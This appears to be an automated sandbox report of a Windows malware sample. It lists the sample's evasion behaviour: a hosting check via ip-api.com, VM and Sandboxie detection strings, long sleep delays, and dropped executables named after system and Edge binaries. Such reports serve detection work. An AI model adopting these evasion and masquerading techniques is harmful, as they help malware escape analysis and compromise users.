                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Update.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                    Source: HaLCYOFjMN.exeBinary or memory string: SBIEDLL.DLL%YAVNHDAUQZVHVPFTWT%QPLBY9FRLAFHYUPNWC%WONYWUSOUF57FGFBFX%P0VVRNU4AUPIANBK0P%FNCGDJ2GW6S5FMQB6Z%LDXBJQJQXTLT05CYVA%3W1JAA2IQAS5ZMQZWD%DUKHC2PADSDKKJDTFG%R61FLGIT8DU2T8GAL1%0WHEIPCAEGNANHFXCN%I27LYXQ7ZUDVG22EBT%A1A2ACRUYKPRB2WR0M%GFHRUDMCATSILFJUKL%4RV88MYRHF9NMGPRNL%FKNMVDKN5GO7UGT07EINFO
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMemory allocated: 940000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMemory allocated: 1A560000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 7D0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1A210000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1410000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEMemory allocated: 2730000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEMemory allocated: 1A9C0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 8F0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1A390000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 920000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Update.exeMemory allocated: 1A420000 memory reserve | memory write watch
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeMemory allocated: B50000 memory reserve | memory write watch
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeMemory allocated: 1A990000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 2360000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 1A540000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 17D0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Windows Mail\System.exeMemory allocated: 1B4B0000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599703Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599540Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599204Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 599078Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598968Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598859Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598750Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598640Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598531Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598422Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598297Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598187Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 598078Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597968Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597859Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597750Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597640Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597531Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597421Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597311Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597134Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 597031Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596884Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596760Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596436Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596312Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596200Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 596092Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595984Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595875Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595764Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595656Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595547Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595437Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595328Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595218Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595109Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 595000Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594890Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594781Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594672Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594562Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeThread delayed: delay time: 594450Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Roaming\Update.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEThread delayed: delay time: 922337203685477
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWindow / User API: threadDelayed 2667Jump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWindow / User API: threadDelayed 7136Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6887Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2868Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7073Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2531Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7882Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1816Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7747
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1897
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\MwyHCbxj.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\hLMvsgWt.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Update.exe.exe (copy)Jump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\gOlnWgHy.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\poUkcZma.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\mGNMzMMn.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\nuSUkZIl.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\cXuwPjHF.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\RjQGfYMX.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Update.exeJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\WfRXmDCR.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\IJgIaehv.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\yaMsqCcN.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\vphcjoRU.logJump to dropped file
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeDropped PE file which has not been started: C:\Users\user\Desktop\zXoALCrI.logJump to dropped file
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599703s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599540s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599437s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599328s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599204s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -599078s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598968s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598859s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598750s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598640s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598422s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598297s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598187s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -598078s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597968s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597859s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597750s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597640s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597531s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597421s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597311s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597134s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -597031s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596884s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596760s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596436s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exe TID: 7176Thread sleep time: -596312s >= -30000sJump to behavior
